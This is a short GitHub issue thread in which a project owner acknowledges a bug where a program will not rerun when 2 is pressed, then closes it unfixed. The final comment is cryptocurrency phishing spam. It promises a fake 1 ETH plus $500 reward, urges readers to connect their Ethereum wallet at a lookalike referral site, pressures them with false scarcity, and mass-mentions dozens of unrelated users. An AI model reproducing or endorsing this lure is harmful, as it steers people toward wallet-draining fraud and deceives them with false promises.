### ISSUE TITLE
will not redo the program when pressing 2

### ISSUE THREAD

**Issue by chssky1** [chssky1/ToolsForNerds#1]
i have no idea why

**Comment by chssky1** [comment]
This is happening due to an issue with my Windows directory parameters. Will be fixed in the next release.

**Comment by chssky1** [comment]
Not fixing due to time restrictions, if you wanna go for it, go ahead.

**Comment by chssky1** [comment]
Closing issue

**Comment by tychiadet** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
whc-long, @805karansaini, @fc500110, @pcdinh, @PogoRollo, @egisz, @mutalisk999, @ccrabbit2021, @echo-ht, @quetz-design, @uvknowledge, @StephanSalas, @RyzeNGrind, @baiheinet, @GGoziker, @w3t, @potatogim, @brentzucker, @noahwagner, @iamnasirudeen, @tchigher, @lmcdonough, @benhaben, @TryAndErr0r, @davidgoh, @ViiRal, @mripani, @liuguiyou, @thookham, @Mahdikh75, @xtheing, @totpero, @liwei2016, @MaximScheepens, @GlitchXploitr, @fishonline, @meketadev, @DominicFrei, @johguentner, @hlxwell, @ali-ghn, @DwGoing, @hhcalder92, @elevenE, @jasantunes, @cassiomwandrade, @koder101, @AlexiaChen, @WajahatAliAbid, @97686773
